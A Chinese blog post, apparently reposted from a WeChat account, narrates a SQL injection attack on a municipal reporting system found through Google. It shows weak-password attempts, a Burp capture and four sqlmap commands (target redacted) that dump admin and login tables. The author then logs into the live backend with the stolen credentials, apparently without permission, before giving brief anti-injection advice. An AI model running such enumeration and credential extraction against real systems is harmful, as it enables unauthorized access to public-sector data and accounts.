记某市某管理系统SQL注入漏洞

admin 2024年10月14日05:29:05评论16 views字数 1381阅读4分36秒阅读模式

前言

近日在谷歌引擎查找到一个站点。是某市的某报到系统。漏洞已经上报CNVD,这里就当是记录分享了。

过程记录

1.进来是一个管理员登陆入口,进去了之后尝试用一些弱口令进行登录。无果,这里就暂时放弃暴力破解。尝试寻找其他突破口。

记某市某管理系统SQL注入漏洞

2.进入网站的主界面,有一处查询框。一般这样的搜索查询框可能会有SQL注入。

记某市某管理系统SQL注入漏洞

3.尝试能不能进行SQL注入。直接随便输入,然后在后面加上单引号进行验证。果然不出所料报错了,报错信息可以看出是Access数据库,真让人头大。

记某市某管理系统SQL注入漏洞

4.由于url上没有明确显示可以注入的参数,怀疑可能是POST传参,于是打开Burp抓包看看。

记某市某管理系统SQL注入漏洞

5. 是GET类型的传参,只是被隐藏了。直接复制url到域名处。然后使用工具sqlmap进行注入。首先是简单查询一些服务器的信息。确定能够进行SQL注入。这里保险起见,加上了“delay”参数。

sqlmap语句:

python sqlmap.py -u

"http://XXXX//report/reportsearch.aspXXXX&username=admin&XXXX"--delay 1 --batch -random-agent -p "username"

记某市某管理系统SQL注入漏洞

6.access数据库是没有数据库,只有表结构。所以直接查询所有的表名(与其说是查询不如说是爆破)。指定注入的参数为“username”,这里是查询到了管理员表。

sqlmap语句:

python sqlmap.py -u

"http://XXXX//report/reportsearch.aspXXXX&username=admin&XXXX"--delay 1 --batch -random-agent -p "username" --tables

记某市某管理系统SQL注入漏洞

7.继续查询管理员表的列名,并且查询其值。

sqlmap语句:

python sqlmap.py -u

"http://XXXX//report/reportsearch.aspXXXX&username=admin&XXXX"--delay 1 --batch -random-agent -p "username" -T admin --colum

记某市某管理系统SQL注入漏洞

这里用得到的账号密码并不能登陆管理后台。之前也试过这个密码,白白等了那么久😒

8.前面有看到有个表叫做login,那好吧,最后查一个,因为access数据库太慢了。成功查询到后台账号密码了。试试登陆。

sqlmap语句:

python sqlmap.py -u

"http://XXXX//report/reportsearch.aspXXXX&username=admin&XXXX"--delay 1 --batch -random-agent -p "username" -T login --colum

记某市某管理系统SQL注入漏洞

9.成功进入后台,到此就差不多了。新手不敢做太多事情,溜了溜了。

记某市某管理系统SQL注入漏洞

总结

程序员在开发过程中,难免出错,但是一些基础的防注入措施还是挺有必要的。

(1)对进入数据库的特殊字符(’”&*;等)要进行处理。

(2)应严格规定数据长度,以防在一定程度上正确执行较长的SQL注入语句。

还有值得一提的是,Access数据库只有表结构,在使用sqlmap的时候,就不用猜解数据库(--dbs)了。

更多文章请关注公众号:星河疯客admin

记某市某管理系统SQL注入漏洞

万水千山总是情,点赞再走行不行的(ง •_•)ง

原文始发于微信公众号(星河疯客admin):记某市某管理系统SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月14日05:29:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记某市某管理系统SQL注入漏洞https://cn-sec.com/archives/881044.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息